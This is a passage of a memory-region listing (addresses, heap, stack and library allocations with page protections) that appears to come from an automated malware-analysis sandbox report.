page read and write
|
||
|
1D4AC068000
|
trusted library allocation
|
page read and write
|
||
|
1250FD89000
|
heap
|
page read and write
|
||
|
1250FD84000
|
heap
|
page read and write
|
||
|
7FFE16960000
|
trusted library allocation
|
page read and write
|
||
|
1250E0E2000
|
heap
|
page read and write
|
||
|
1250FD72000
|
heap
|
page read and write
|
||
|
12510B88000
|
heap
|
page read and write
|
||
|
1250E0F3000
|
heap
|
page read and write
|
||
|
1250FD80000
|
heap
|
page read and write
|
||
|
12510BE5000
|
heap
|
page read and write
|
||
|
2CA13774000
|
heap
|
page read and write
|
||
|
12510380000
|
heap
|
page read and write
|
||
|
7FFE1677B000
|
trusted library allocation
|
page read and write
|
||
|
A791A7E000
|
stack
|
page read and write
|
||
|
12510C82000
|
heap
|
page read and write
|
||
|
1250FD7D000
|
heap
|
page read and write
|
||
|
1250DFC0000
|
heap
|
page read and write
|
||
|
1250E02F000
|
heap
|
page read and write
|
||
|
1250E086000
|
heap
|
page read and write
|
||
|
7FFE16763000
|
trusted library allocation
|
page execute and read and write
|
||
|
125100D0000
|
heap
|
page read and write
|
||
|
1D4C3C4F000
|
heap
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
1D4AC232000
|
trusted library allocation
|
page read and write
|
||
|
2CA152C0000
|
heap
|
page execute and read and write
|
||
|
2CA26388000
|
trusted library allocation
|
page read and write
|
||
|
1250E210000
|
heap
|
page read and write
|
||
|
1D4AC093000
|
trusted library allocation
|
page read and write
|
||
|
1250E0E2000
|
heap
|
page read and write
|
||
|
7FFE1681C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CA1372D000
|
heap
|
page read and write
|
||
|
12FD755000
|
stack
|
page read and write
|
||
|
7FFE16A50000
|
trusted library allocation
|
page read and write
|
||
|
1D4AC12D000
|
trusted library allocation
|
page read and write
|
||
|
2CA13703000
|
heap
|
page read and write
|
||
|
1250FD8E000
|
heap
|
page read and write
|
||
|
DB1E77E000
|
stack
|
page read and write
|
||
|
7FFE169B0000
|
trusted library allocation
|
page read and write
|
||
|
12510B7B000
|
heap
|
page read and write
|
||
|
12510BB8000
|
heap
|
page read and write
|
||
|
125100D6000
|
heap
|
page read and write
|
||
|
7FFE16A30000
|
trusted library allocation
|
page read and write
|
||
|
1D4C3CE7000
|
heap
|
page read and write
|
||
|
7FFE16930000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4AB7C8000
|
heap
|
page read and write
|
||
|
12510B8F000
|
heap
|
page read and write
|
||
|
12510E43000
|
heap
|
page read and write
|
||
|
1250E0C6000
|
heap
|
page read and write
|
||
|
2CA1374D000
|
heap
|
page read and write
|
||
|
1D4ABC35000
|
trusted library allocation
|
page read and write
|
||
|
125100F1000
|
heap
|
page read and write
|
||
|
125100A3000
|
heap
|
page read and write
|
||
|
2CA256A1000
|
trusted library allocation
|
page read and write
|
||
|
12510E31000
|
heap
|
page read and write
|
||
|
2CA1BB7D000
|
trusted library allocation
|
page read and write
|
||
|
12510350000
|
heap
|
page read and write
|
||
|
1250FD92000
|
heap
|
page read and write
|
||
|
7FFE1676D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D4A9B3E000
|
heap
|
page read and write
|
||
|
A7918FF000
|
stack
|
page read and write
|
||
|
A79197F000
|
stack
|
page read and write
|
||
|
12510B5E000
|
heap
|
page read and write
|
||
|
7FFE16A90000
|
trusted library allocation
|
page read and write
|
||
|
12FE4FF000
|
stack
|
page read and write
|
||
|
2CA25988000
|
trusted library allocation
|
page read and write
|
||
|
125100F3000
|
heap
|
page read and write
|
||
|
12510B98000
|
heap
|
page read and write
|
||
|
1D4ABC2F000
|
trusted library allocation
|
page read and write
|
||
|
2CA15A7A000
|
trusted library allocation
|
page read and write
|
||
|
2CA15691000
|
trusted library allocation
|
page read and write
|
||
|
12510D00000
|
heap
|
page read and write
|
||
|
A791B3E000
|
stack
|
page read and write
|
||
|
1D4ABFB3000
|
trusted library allocation
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
12510310000
|
heap
|
page read and write
|
||
|
1D4AC0E4000
|
trusted library allocation
|
page read and write
|
||
|
1D4C3E28000
|
heap
|
page read and write
|
||
|
2CA15340000
|
heap
|
page read and write
|
||
|
7FFE16A00000
|
trusted library allocation
|
page read and write
|
||
|
1250E0CE000
|
heap
|
page read and write
|
||
|
2CA13800000
|
heap
|
page read and write
|
||
|
1250FDB7000
|
heap
|
page read and write
|
||
|
1250E084000
|
heap
|
page read and write
|
||
|
2CA15A82000
|
trusted library allocation
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
12510114000
|
heap
|
page read and write
|
||
|
7FFE16A80000
|
trusted library allocation
|
page read and write
|
||
|
2CA13A30000
|
trusted library allocation
|
page read and write
|
||
|
12510E31000
|
heap
|
page read and write
|
||
|
1D4ABF8F000
|
trusted library allocation
|
page read and write
|
||
|
1D4ABC38000
|
trusted library allocation
|
page read and write
|
||
|
2CA25691000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16A10000
|
trusted library allocation
|
page read and write
|
||
|
DB1EBBE000
|
stack
|
page read and write
|
||
|
DB1E6FE000
|
stack
|
page read and write
|
||
|
12510133000
|
heap
|
page read and write
|
||
|
12510E31000
|
heap
|
page read and write
|
||
|
2CA1A92C000
|
trusted library allocation
|
page read and write
|
||
|
1250DEC0000
|
heap
|
page read and write
|
||
|
1D4A9AF0000
|
heap
|
page read and write
|
||
|
A7917FE000
|
stack
|
page read and write
|
||
|
12510D48000
|
heap
|
page read and write
|
||
|
12510020000
|
remote allocation
|
page read and write
|
||
|
1250E280000
|
heap
|
page read and write
|
||
|
2CA13940000
|
heap
|
page read and write
|
||
|
1250FDB8000
|
heap
|
page read and write
|
||
|
1D4C3C62000
|
heap
|
page read and write
|
||
|
12510020000
|
remote allocation
|
page read and write
|
||
|
125100C8000
|
heap
|
page read and write
|
||
|
1D4ABC40000
|
trusted library allocation
|
page read and write
|
||
|
12510C4A000
|
heap
|
page read and write
|
||
|
1250FD77000
|
heap
|
page read and write
|
||
|
2CA15A6A000
|
trusted library allocation
|
page read and write
|
||
|
12510080000
|
heap
|
page read and write
|
||
|
2CA1B32C000
|
trusted library allocation
|
page read and write
|
||
|
7DF4D1750000
|
trusted library allocation
|
page execute and read and write
|
||
|
1250FD86000
|
heap
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
1250FDC5000
|
heap
|
page read and write
|
||
|
125100DB000
|
heap
|
page read and write
|
||
|
12510CAE000
|
heap
|
page read and write
|
||
|
1D4A9E50000
|
heap
|
page read and write
|
||
|
12510390000
|
heap
|
page read and write
|
||
|
1D4AB6E0000
|
heap
|
page execute and read and write
|
||
|
1250E0B9000
|
heap
|
page read and write
|
||
|
1D4AB6B0000
|
heap
|
page execute and read and write
|
||
|
2CA26D88000
|
trusted library allocation
|
page read and write
|
||
|
1250FDA0000
|
heap
|
page read and write
|
||
|
1D4A9CE0000
|
heap
|
page read and write
|
||
|
125100DC000
|
heap
|
page read and write
|
||
|
125100A1000
|
heap
|
page read and write
|
||
|
7FFE169D0000
|
trusted library allocation
|
page read and write
|
||
|
1D4BBB20000
|
trusted library allocation
|
page read and write
|
||
|
DB1E1E3000
|
stack
|
page read and write
|
||
|
1250E0AD000
|
heap
|
page read and write
|
||
|
1D4A9B38000
|
heap
|
page read and write
|
||
|
12510C16000
|
heap
|
page read and write
|
||
|
1250FD73000
|
heap
|
page read and write
|
||
|
12510B60000
|
heap
|
page read and write
|
||
|
7FFE16990000
|
trusted library allocation
|
page read and write
|
||
|
12510CB1000
|
heap
|
page read and write
|
||
|
2CA19F2C000
|
trusted library allocation
|
page read and write
|
||
|
2CA182EB000
|
trusted library allocation
|
page read and write
|
||
|
12510020000
|
remote allocation
|
page read and write
|
||
|
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
|
A79177E000
|
stack
|
page read and write
|
||
|
2CA13A40000
|
heap
|
page read and write
|
||
|
125100C8000
|
heap
|
page read and write
|
||
|
1D4A9CC0000
|
heap
|
page read and write
|
||
|
1250DFA0000
|
heap
|
page read and write
|
||
|
12FDAFE000
|
stack
|
page read and write
|
||
|
DB1E67E000
|
stack
|
page read and write
|
||
|
12510BAF000
|
heap
|
page read and write
|
||
|
7FFE16A20000
|
trusted library allocation
|
page read and write
|
||
|
1D4C3CF2000
|
heap
|
page read and write
|
||
|
A7913E3000
|
stack
|
page read and write
|
||
|
1D4C3E66000
|
heap
|
page read and write
|
||
|
DB1EB3E000
|
stack
|
page read and write
|
||
|
1D4AB680000
|
heap
|
page execute and read and write
|
||
|
2CA152E0000
|
heap
|
page execute and read and write
|
||
|
1250FD74000
|
heap
|
page read and write
|
||
|
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
|
DB1F60E000
|
stack
|
page read and write
|
||
|
12510CAE000
|
heap
|
page read and write
|
||
|
1250FD86000
|
heap
|
page read and write
|
||
|
7FFE16909000
|
trusted library allocation
|
page read and write
|
||
|
1250E0E2000
|
heap
|
page read and write
|
||
|
1D4AB7C6000
|
heap
|
page read and write
|
||
|
1250E285000
|
heap
|
page read and write
|
||
|
12510E31000
|
heap
|
page read and write
|
||
|
7FFE16914000
|
trusted library allocation
|
page read and write
|
||
|
1D4C3D12000
|
heap
|
page read and write
|
||
|
2CA15A86000
|
trusted library allocation
|
page read and write
|
||
|
125100D0000
|
heap
|
page read and write
|
||
|
1250FD81000
|
heap
|
page read and write
|
||
|
12FE2FB000
|
stack
|
page read and write
|
||
|
1D4A9B80000
|
heap
|
page read and write
|
||
|
2CA15A75000
|
trusted library allocation
|
page read and write
|
||
|
12FDBFE000
|
stack
|
page read and write
|
||
|
2CA15AAE000
|
trusted library allocation
|
page read and write
|
||
|
1250FD70000
|
heap
|
page read and write
|
||
|
2CA138E0000
|
heap
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
125100E7000
|
heap
|
page read and write
|
||
|
12510CAE000
|
heap
|
page read and write
|
||
|
1D4C3E84000
|
heap
|
page read and write
|
||
|
1250E082000
|
heap
|
page read and write
|
||
|
1250FD7D000
|
heap
|
page read and write
|
||
|
7FFE16820000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE16AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE169F0000
|
trusted library allocation
|
page read and write
|
||
|
A79187C000
|
stack
|
page read and write
|
||
|
125100DC000
|
heap
|
page read and write
|
||
|
12510D90000
|
heap
|
page read and write
|
||
|
2CA256FF000
|
trusted library allocation
|
page read and write
|
||
|
1D4ABB7C000
|
trusted library allocation
|
page read and write
|
||
|
2CA15AAA000
|
trusted library allocation
|
page read and write
|
||
|
1250E0C6000
|
heap
|
page read and write
|
||
|
12510CC0000
|
heap
|
page read and write
|
||
|
12510E47000
|
heap
|
page read and write
|
||
|
12510CAE000
|
heap
|
page read and write
|
||
|
2CA15346000
|
heap
|
page read and write
|
||
|
2CA15711000
|
trusted library allocation
|
page read and write
|
||
|
12FDFFE000
|
stack
|
page read and write
|
||
|
1D4A9D60000
|
trusted library allocation
|
page read and write
|
||
|
A791E3E000
|
stack
|
page read and write
|
||
|
1D4ABBAB000
|
trusted library allocation
|
page read and write
|
||
|
12510D41000
|
heap
|
page read and write
|
||
|
2CA15AE7000
|
trusted library allocation
|
page read and write
|
||
|
1250FD7E000
|
heap
|
page read and write
|
||
|
12510730000
|
heap
|
page read and write
|
||
|
DB1F68D000
|
stack
|
page read and write
|
||
|
12510B68000
|
heap
|
page read and write
|
||
|
1250E0A3000
|
heap
|
page read and write
|
||
|
DB1E4FE000
|
stack
|
page read and write
|
||
|
2CA1952C000
|
trusted library allocation
|
page read and write
|
||
|
12FDEFE000
|
stack
|
page read and write
|
||
|
1D4C3D0D000
|
heap
|
page read and write
|
||
|
1250E03D000
|
heap
|
page read and write
|
||
|
1D4ABF23000
|
trusted library allocation
|
page read and write
|
||
|
2CA164EB000
|
trusted library allocation
|
page read and write
|
||
|
12510D40000
|
heap
|
page read and write
|
||
|
1D4ABC46000
|
trusted library allocation
|
page read and write
|
||
|
12510143000
|
heap
|
page read and write
|
||
|
1D4A9E55000
|
heap
|
page read and write
|
||
|
1D4AC234000
|
trusted library allocation
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
1250FD8A000
|
heap
|
page read and write
|
||
|
7FFE16A70000
|
trusted library allocation
|
page read and write
|
||
|
DB1EABE000
|
stack
|
page read and write
|
||
|
2CA136F0000
|
heap
|
page read and write
|
||
|
1D4ABF6B000
|
trusted library allocation
|
page read and write
|
||
|
1250FDC5000
|
heap
|
page read and write
|
||
|
2CA13900000
|
heap
|
page read and write
|
||
|
2CA152D0000
|
heap
|
page read and write
|
||
|
1D4A9B46000
|
heap
|
page read and write
|
||
|
1D4AC0D3000
|
trusted library allocation
|
page read and write
|
||
|
1D4ABB11000
|
trusted library allocation
|
page read and write
|
||
|
1250E03D000
|
heap
|
page read and write
|
||
|
2CA16EEB000
|
trusted library allocation
|
page read and write
|
||
|
1250E02A000
|
heap
|
page read and write
|
||
|
7FFE16920000
|
trusted library allocation
|
page execute and read and write
|
||
|
12510DDE000
|
heap
|
page read and write
|
||
|
DB1E83E000
|
stack
|
page read and write
|
||
|
1250FD91000
|
heap
|
page read and write
|
||
|
1D4AB687000
|
heap
|
page execute and read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
125100D2000
|
heap
|
page read and write
|
||
|
7FFE16816000
|
trusted library allocation
|
page read and write
|
||
|
A79167E000
|
stack
|
page read and write
|
||
|
DB1E57E000
|
stack
|
page read and write
|
||
|
12510BAF000
|
heap
|
page read and write
|
||
|
12510173000
|
heap
|
page read and write
|
||
|
12FDDFE000
|
stack
|
page read and write
|
||
|
12510530000
|
heap
|
page read and write
|
||
|
1D4C3E20000
|
heap
|
page read and write
|
||
|
1250E03D000
|
heap
|
page read and write
|
||
|
1D4C3C88000
|
heap
|
page read and write
|
||
|
1D4C4080000
|
heap
|
page read and write
|
||
|
2CA13980000
|
trusted library allocation
|
page read and write
|
||
|
1250E087000
|
heap
|
page read and write
|
||
|
12510B66000
|
heap
|
page read and write
|
||
|
7FFE16911000
|
trusted library allocation
|
page read and write
|
||
|
DB1EA3E000
|
stack
|
page read and write
|
||
|
2CA18CEB000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16A60000
|
trusted library allocation
|
page read and write
|
||
|
12510173000
|
heap
|
page read and write
|
||
|
1250E0F3000
|
heap
|
page read and write
|
||
|
12510143000
|
heap
|
page read and write
|
||
|
1250FD75000
|
heap
|
page read and write
|
||
|
1250E05A000
|
heap
|
page read and write
|
||
|
1250FD97000
|
heap
|
page read and write
|
||
|
1250FD84000
|
heap
|
page read and write
|
||
|
1250E030000
|
heap
|
page read and write
|
||
|
1D4ABB2F000
|
trusted library allocation
|
page read and write
|
||
|
2CA139B0000
|
heap
|
page readonly
|
||
|
A791ABF000
|
stack
|
page read and write
|
||
|
1D4C3C2D000
|
heap
|
page read and write
|
||
|
1250FD75000
|
heap
|
page read and write
|
||
|
12510BAF000
|
heap
|
page read and write
|
||
|
12510CAE000
|
heap
|
page read and write
|
||
|
1D4A9DC0000
|
heap
|
page read and write
|
||
|
12510B77000
|
heap
|
page read and write
|
||
|
12510B63000
|
heap
|
page read and write
|
||
|
1250E04E000
|
heap
|
page read and write
|
||
|
1D4AB7CC000
|
heap
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
125100EC000
|
heap
|
page read and write
|
||
|
12510B5A000
|
heap
|
page read and write
|
||
|
12510B8D000
|
heap
|
page read and write
|
||
|
2CA13710000
|
heap
|
page read and write
|
||
|
7FFE16900000
|
trusted library allocation
|
page read and write
|
||
|
1D4ABC32000
|
trusted library allocation
|
page read and write
|
||
|
1D4AC0AB000
|
trusted library allocation
|
page read and write
|
||
|
1250FD7A000
|
heap
|
page read and write
|
||
|
125100D4000
|
heap
|
page read and write
|
||
|
1D4ABC43000
|
trusted library allocation
|
page read and write
|
||
|
1D4C3C20000
|
heap
|
page read and write
|
||
|
7FFE169A0000
|
trusted library allocation
|
page read and write
|
||
|
12FE3FE000
|
stack
|
page read and write
|
||
|
1250E0C6000
|
heap
|
page read and write
|
||
|
1D4ABEFA000
|
trusted library allocation
|
page read and write
|
||
|
12510133000
|
heap
|
page read and write
|
||
|
1250E082000
|
heap
|
page read and write
|
||
|
12510CAE000
|
heap
|
page read and write
|
||
|
DB1E7F9000
|
stack
|
page read and write
|
||
|
7FFE169C0000
|
trusted library allocation
|
page read and write
|
||
|
1250E03F000
|
heap
|
page read and write
|
||
|
125100F1000
|
heap
|
page read and write
|
||
|
1250E08B000
|
heap
|
page read and write
|
||
|
2CA13A45000
|
heap
|
page read and write
|
||
|
1250E05A000
|
heap
|
page read and write
|
||
|
1250E068000
|
heap
|
page read and write
|
||
|
1250E0AD000
|
heap
|
page read and write
|
||
|
1250FD71000
|
heap
|
page read and write
|
||
|
125102B0000
|
heap
|
page read and write
|
||
|
1D4ABB39000
|
trusted library allocation
|
page read and write
|
||
|
1250FD9E000
|
heap
|
page read and write
|
||
|
1250E08D000
|
heap
|
page read and write
|
||
|
1D4BBB7F000
|
trusted library allocation
|
page read and write
|
||
|
125100FE000
|
heap
|
page read and write
|
||
|
125100C8000
|
heap
|
page read and write
|
||
|
7FFE169E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16970000
|
trusted library allocation
|
page read and write
|
||
|
2CA13776000
|
heap
|
page read and write
|
||
|
12510205000
|
heap
|
page read and write
|
There are 409 hidden memdumps, click here to show them.